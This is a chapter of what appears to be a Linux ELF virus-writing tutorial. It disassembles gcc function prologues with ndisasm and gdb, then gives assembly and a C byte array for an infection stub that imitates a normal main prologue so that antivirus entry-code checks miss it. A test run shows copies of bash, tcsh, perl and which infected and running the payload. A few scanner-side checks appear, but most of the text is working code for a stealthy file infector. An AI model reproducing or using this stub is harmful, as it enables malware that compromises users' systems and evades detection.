11. The stub revisited

 

A person who is more than casually interested in computers should be well schooled in machine language, since it is a fundamental part of a computer.

 Donald Knuth

The scanners in Turn the pages and Second scan check program layout for deviations. On a typical Linux distribution this yields good results since all programs are compiled and linked with the same set of tools. But there are legitimate reasons for executables to look different. Some rescue tools and non-free executables are linked statically to be independent of the target system. And then there is asmutils on http://linuxassembly.org/

asmutils is a set of miscellaneous utilities written in assembly language, targeted on embedded systems and small distributions (e.g. installation or rescue disks); also it contains a small libc and a crypto library. It features the smallest possible size and memory requirements, the fastest speed, and offers fairly good functionality.

The next best approach is to follow the flow of control and verify visited code, starting from the entry point. Again this relies on a certain homogeneity of executables.

  1. A very simple check is alignment. We handle that here and here. gcc(1) never starts functions on odd addresses. But neither VIT nor RST seems to care; both put the infection directly after the last byte of the code segment.

  2. The improved versions of patchEntryAddr in The entry point do a primitive check of the call to __libc_start_main. Since we leave the entry point unmodified we pass this test.

  3. The next step is to check entry code of functions called by __libc_start_main, especially main. We are vulnerable to this.
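
The alignment test from item 1 takes only a few lines of shell when seen from the scanner's side. This is a minimal sketch, not the code of any existing scanner. The function name is_aligned and the default boundary of 2 are assumptions made for illustration.

```shell
#!/bin/sh
# Hypothetical helper: succeed if address $1 is a multiple of boundary $2.
# The default boundary of 2 only rejects odd addresses.
is_aligned() {
  [ $(( $1 % ${2:-2} )) -eq 0 ]
}

# 0x08048460 is the address of main in the magic_elf listing of this chapter.
is_aligned 0x08048460 16 && echo "0x08048460: aligned"
# 0x0804846F lies inside main; it serves only as a counter-example.
is_aligned 0x0804846F || echo "0x0804846F: odd address"
```

A real scanner would take the address from the symbol table or from the arguments pushed before the call to __libc_start_main instead of a literal.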

11.1. Disassembly

patchEntryAddr 3.0 patches the call of __libc_start_main to invoke our virus code instead of main. To stay undetected our code should mimic the real thing. The disassembly of our first program shows everything we need to know. But then that listing was retrieved through heavy cheating.

To disassemble the main of a regular executable we extend the exercise of Disassemble it again, Sam. The script performs no error checking. Feeding it anything other than executables built by gcc(1) can have strange effects (like no output at all). There is also no limit on output length. In the examples below the Makefile building this document used head(1).

Command: src/stub_revisited/ndisasm.sh
#!/bin/sh
file=${1:-/bin/bash}
entry_point=$( od -j24 -An -td4 -N4 ${file} )

# 134512640 = 0x8048000
# 24 = offset to address of main in code of _start
main_point_ofs=$( expr ${entry_point} - 134512640 + 24 )
main=$( od -j${main_point_ofs} -An -td4 -N4 ${file} )
main_ofs=$( expr ${main} - 134512640 )

ndisasm -e ${main_ofs} -o ${main} -U ${file}
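
The arithmetic in the script can be checked by hand. The sketch below repeats it for main of magic_elf, which the first listing below places at 0x08048460. Like the script, it assumes that the code segment maps file offset 0 to virtual address 0x08048000. The function name vaddr_to_offset is made up for this example.

```shell
#!/bin/sh
# Assumption (same as in ndisasm.sh): the first loadable segment maps
# file offset 0 to virtual address 0x08048000.
base=$(( 0x08048000 ))

# Hypothetical helper: convert a virtual address to a file offset.
vaddr_to_offset() {
  echo $(( $1 - base ))
}

echo "base = ${base}"
printf 'main is at file offset %d (0x%x)\n' \
  "$(vaddr_to_offset 0x08048460)" "$(vaddr_to_offset 0x08048460)"
```

This prints base = 134512640, the constant used in the script, and a file offset of 1120 (0x460) for main.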

First a simple test. Compare with the disassembly mentioned above.

Output: out/i386/stub_revisited/magic_elf.ndisasm
08048460  55                push ebp
08048461  89E5              mov ebp,esp
08048463  83EC0C            sub esp,byte +0xc
08048466  6A03              push byte +0x3
08048468  6801800408        push dword 0x8048001
0804846D  6A01              push byte +0x1
0804846F  E8A4FEFFFF        call 0x8048318
08048474  31C0              xor eax,eax
08048476  89EC              mov esp,ebp
08048478  5D                pop ebp

A look at tmp/doing_it_in_c/three/sh_infected.

Output: out/i386/stub_revisited/sh_infected.ndisasm
080C1280  6880940508        push dword 0x8059480
080C1285  9C                pushf
080C1286  60                pusha
080C1287  E804000000        call 0x80c1290
080C128C  61                popa
080C128D  9D                popf
080C128E  C3                ret
080C128F  90                nop
080C1290  55                push ebp
080C1291  89E5              mov ebp,esp

And this is plain /bin/bash.

Output: out/i386/stub_revisited/sh.ndisasm
08059480  55                push ebp
08059481  89E5              mov ebp,esp
08059483  57                push edi
08059484  56                push esi
08059485  53                push ebx
08059486  83EC24            sub esp,byte +0x24
08059489  6A01              push byte +0x1
0805948B  68E0BA0C08        push dword 0x80cbae0
08059490  E8A3F9FFFF        call 0x8058e38
08059495  83C410            add esp,byte +0x10

The first two instructions, making up three bytes (55 89 E5), are constant. They are followed by an optional series of push instructions that save the callee-saved registers edi, esi and ebx. Then comes a sub esp to reserve space for local variables. This also seems to be constant: even the trivial program from In the language of mortals uses no local variables and still ends up with a sub.
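
From the scanner's side, the constant part of this pattern is cheap to test. The following is a minimal sketch, not taken from any real scanner. The helper name has_prologue is hypothetical, and the caller is assumed to supply the file offset of the function, for example as computed by ndisasm.sh.

```shell
#!/bin/sh
# Hypothetical helper: succeed if the three bytes at offset $2 of file $1
# are 55 89 E5, i.e. "push ebp; mov ebp,esp".
has_prologue() {
  bytes=$( od -An -tx1 -j "$2" -N 3 "$1" | tr -d ' \n' )
  [ "${bytes}" = "5589e5" ]
}

# Demonstration on a scratch file holding the first bytes of main from
# the /bin/bash listing (55 89 E5 57 56 53), written as octal escapes.
sample=$( mktemp )
printf '\125\211\345\127\126\123' > "${sample}"
has_prologue "${sample}" 0 && echo "offset 0: prologue found"
has_prologue "${sample}" 3 || echo "offset 3: no prologue"
rm -f "${sample}"
```

The check says nothing about the instructions that follow. The optional push series and the size of the sub vary between programs and would need a real disassembler.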

For the exit code of /bin/bash we need a better filter.

Command: src/stub_revisited/ndisasm_ret.sh
#!/bin/sh
( src/stub_revisited/ndisasm.sh "$@" 2>&1 ) \
| sed -e '/ret/q' \
| tail

Output: out/i386/stub_revisited/sh_ret.ndisasm
08059B2C  A12CB70C08        mov eax,[0x80cb72c]
08059B31  83EC0C            sub esp,byte +0xc
08059B34  50                push eax
08059B35  E826030000        call 0x8059e60
08059B3A  8D65F4            lea esp,[ebp-0xc]
08059B3D  5B                pop ebx
08059B3E  5E                pop esi
08059B3F  5F                pop edi
08059B40  5D                pop ebp
08059B41  C3                ret

I call this weird. It seems that 0xc bytes are reserved on the stack just to stay unused. And why does one program use leave and the other pop ebp? A quote from section A.94 of the nasm documentation:

LEAVE                         ; C9                   [186]

LEAVE destroys a stack frame of the form created by the ENTER instruction (see section A.27). It is functionally equivalent to MOV ESP,EBP followed by POP EBP.

I guess that we are safe on that front. It's easy to check for fixed byte values at a certain location (the entry code). But I doubt that a static scanner could really tell whether a given exit code is just a dummy, or which instruction a ret effectively jumps to.

11.2. Stack dump

Let's examine the stack of In the language of mortals just after the sub was executed. Note that you don't have to quote the character "$" in interactive gdb(1) sessions. Instead of "\$sp" you type plain "$sp" to reference the stack pointer.

Command: src/stub_revisited/stack.sh
#!/bin/sh
file=${1:-tmp/magic_elf/magic_elf}
gdb ${file} -q <<EOT
	break *0x08048466
	run
	backtrace
	printf "esp=%08x ebp=%08x\n", \$esp, \$ebp
	x/3xw \$sp
	x/3xw \$sp + 12
	x/3xw \$sp + 24
	x/3xw \$sp + 36
	x/3xw \$sp + 48
	x/3xw \$sp + 60
	x/3xw \$sp + 72
	x/3xw \$sp + 84
	x/3xw \$sp + 96
	x/3xw \$sp + 108
EOT

Output: out/i386/stub_revisited/stack
(gdb) Breakpoint 1 at 0x8048466
(gdb) Starting program: /home/alba/virus-writing-HOWTO/tmp/magic_elf/magic_elf 

Breakpoint 1, 0x08048466 in main ()
(gdb) #0  0x08048466 in main ()
#1  0x4003e316 in __libc_start_main (main=0x8048460 <main>, argc=1, 
    ubp_av=0xbffff9c4, init=0x80482e0 <_init>, fini=0x80484c0 <_fini>, 
    rtld_fini=0x4000d2fc <_dl_fini>, stack_end=0xbffff9bc)
    at ../sysdeps/generic/libc-start.c:129
(gdb) esp=bffff94c ebp=bffff958
(gdb) 0xbffff94c:	0x08048441	0x080494f8	0x080495f8
(gdb) 0xbffff958:	0xbffff998	0x4003e316	0x00000001
(gdb) 0xbffff964:	0xbffff9c4	0xbffff9cc	0x080482f6
(gdb) 0xbffff970:	0x080484c0	0x00000000	0xbffff998
(gdb) 0xbffff97c:	0x4003e302	0x00000000	0xbffff9cc
(gdb) 0xbffff988:	0x40151240	0x40015898	0x00000001
(gdb) 0xbffff994:	0x08048360	0x00000000	0x08048381
(gdb) 0xbffff9a0:	0x08048460	0x00000001	0xbffff9c4
(gdb) 0xbffff9ac:	0x080482e0	0x080484c0	0x4000d2fc
(gdb) 0xbffff9b8:	0xbffff9bc	0x40015eec	0x00000001
(gdb) 

The program was stopped at address 0x8048466 in function main, which was called from __libc_start_main. We already encountered file ../sysdeps/generic/libc-start.c in Use the Source, Luke. Out of sheer curiosity, here is a look at line 129:

Command: src/stub_revisited/get_libc_start_main.sh
#!/bin/sh
output=${1:-src/stub_revisited/__libc_start_main}
stack=${2:-out/i386/stub_revisited/stack}

base_dir=$(
  find /usr/src/redhat/SOURCES -maxdepth 1 -type d -name 'glibc-*'
)

# If the file is not in the place I'm used to on my machine
# we fall back to the copy shipped with this document.
# Forcing my usage of SRPMs gains nothing.
[ -d "${base_dir}" ] || exit 0

sed -n -e 's/:/ /g' -e 's/^ *at *//p' < ${stack} \
| ( read original_filename line_number

  filename="${base_dir}/${original_filename#../}"
  [ -e ${filename} ] || exit 0

  start=$( expr ${line_number} - 8 )
  end=$( expr ${line_number} + 4 )

  ( echo "# ${filename}"
    echo ""
    nl -ba -p ${filename} | sed -n -e "${start},${end} p"
  ) > ${output}
)

Command: src/stub_revisited/__libc_start_main
# /usr/src/redhat/SOURCES/glibc-2.2.4/sysdeps/generic/libc-start.c

   121	  if (init)
   122	    (*init) ();
   123	
   124	#ifdef SHARED
   125	  if (__builtin_expect (_dl_debug_mask & DL_DEBUG_IMPCALLS, 0))
   126	    _dl_debug_printf ("\ntransferring control: %s\n\n", argv[0]);
   127	#endif
   128	
   129	  exit ((*main) (argc, argv, __environ));
   130	}

Makes sense to me.

Address                  Contents
esp + 16 = ebp + 4       return address
esp + 12 = ebp + 0       saved ebp
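
Both rows follow from the register values in the dump. As a quick check, the sketch below redoes the arithmetic with the addresses printed by gdb above; nothing else is assumed.

```shell
#!/bin/sh
# Values copied from the gdb output above.
esp=$(( 0xbffff94c ))
ebp=$(( 0xbffff958 ))

# Distance between the two registers: the 0xc bytes reserved by sub esp.
printf 'ebp - esp = %d\n' $(( ebp - esp ))
# Saved ebp sits at ebp + 0, the return address one word above it.
printf 'saved ebp      at 0x%x\n' $(( esp + 12 ))
printf 'return address at 0x%x\n' $(( esp + 16 ))
```

In the dump the word at 0xbffff958 is 0xbffff998 and the word at 0xbffff95c is 0x4003e316, the same address that backtrace reports for frame #1.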

11.3. Implementation

Source: src/stub_revisited/infection.asm
		BITS 32

		push	ebp
		mov	ebp,esp
		sub	esp,byte 0xc
		call	wrapper
		leave
		ret

		align	4
wrapper:	mov	eax,dword 0
		xchg	eax,[ebp]
		sub	ebp,byte 4
		mov	[ebp],eax

		align 16
core:

Source: out/i386/stub_revisited/infection.inc
const unsigned char Target::infection[]
__attribute__ (( aligned(16), section(".text") )) =
{
  0x55,                          /* 00000000: push ebp             */
  0x89,0xE5,                     /* 00000001: mov ebp,esp          */
  0x83,0xEC,0x0C,                /* 00000003: sub esp,byte +0xc    */
  0xE8,0x05,0x00,0x00,0x00,      /* 00000006: call 0x10            */
  0xC9,                          /* 0000000B: leave                */
  0xC3,                          /* 0000000C: ret                  */
  0x90,                          /* 0000000D: nop                  */
  0x90,                          /* 0000000E: nop                  */
  0x90,                          /* 0000000F: nop                  */
  0xB8,0x00,0x00,0x00,0x00,      /* 00000010: mov eax,0x0          */
  0x87,0x45,0x00,                /* 00000015: xchg eax,[ebp+0x0]   */
  0x83,0xED,0x04,                /* 00000018: sub ebp,byte +0x4    */
  0x89,0x45,0x00,                /* 0000001B: mov [ebp+0x0],eax    */
  0x90,                          /* 0000001E: nop                  */
  0x90                           /* 0000001F: nop                  */
};

Source: src/stub_revisited/entry_point_ofs.inc
enum { ENTRY_POINT_OFS = 0x11 };

11.4. Test run

Output: out/i386/stub_revisited/three/cc
Infecting copy of /bin/tcsh... wrote 192 bytes, Ok
Infecting copy of /usr/bin/perl... wrote 192 bytes, Ok
Infecting copy of /usr/bin/which... wrote 192 bytes, Ok
Infecting copy of /bin/sh... wrote 192 bytes, Ok

Output: out/i386/stub_revisited/test
ELF is dead baby, ELF is dead.
/home/alba/virus-writing-HOWTO/tmp/stub_revisited/three/sh_infected
2.05.8(1)-release
/usr/bin/which
ELF is dead baby, ELF is dead.
/usr/bin/which
ELF is dead baby, ELF is dead.
tcsh 6.10.00 (Astron) 2000-11-19 (i386-intel-linux) options 8b,nls,dl,al,kan,rh,color,dspm
ELF is dead baby, ELF is dead.


ELF is dead baby, ELF is dead.
GNU bash, version 2.05.8(1)-release (i386-redhat-linux-gnu)
Copyright 2000 Free Software Foundation, Inc.